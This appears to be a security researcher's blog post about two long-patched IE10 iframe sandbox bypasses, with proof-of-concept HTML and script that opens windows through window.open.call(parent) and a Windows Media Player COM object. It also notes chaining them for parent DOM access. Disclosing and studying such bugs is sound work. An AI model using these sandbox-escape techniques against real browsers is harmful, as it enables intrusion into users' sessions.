IE10 Sandbox ms-allow-popups Bypass

While looking at the IE10 sandbox flags, I found two ways to open new windows from a sandboxed iframe even when ms-allow-popups was not set. Both techniques worked even across origins, which made them more interesting than a simple same-origin sandbox escape.

<!-- parent page -->
<iframe sandbox="allow-scripts" src="sandboxed.html"></iframe>

<!-- sandboxed.html -->
<input type="button" value="Open using window.open.call(parent)" onclick="openCallParent()" />
<input type="button" value="Open using Windows Media Player" onclick="wmpObject()" />
<input type="button" value="Open using regular window.open" onclick="window.open('http://www.bing.com')" />
<script>
function openCallParent()
{
    window.open.call(parent,"http://www.bing.com");
}
function wmpObject()
{
    if (!document.all.oWMP)
    {
        document.body.insertAdjacentHTML('beforeEnd','<object id="oWMP" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6" width="1" height="1"></object>');
    }
    document.all.oWMP.launchURL('http://www.bing.com');
}
</script>

The first technique borrowed window.open and called it in the parent’s context using .call(parent), which sidestepped the sandbox restriction entirely since the open was attributed to the unsandboxed parent. The second technique used the Windows Media Player launchURL method, which opened a window through a COM path that the sandbox did not intercept. Combining either bypass with the modeless dialog bridge technique from an earlier finding allowed full parent DOM access from a sandboxed frame.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 Workers Load Redirected URL (Cross-Origin)] :: [IE10 Sandbox Bypass via SVG JavaScript xLink] >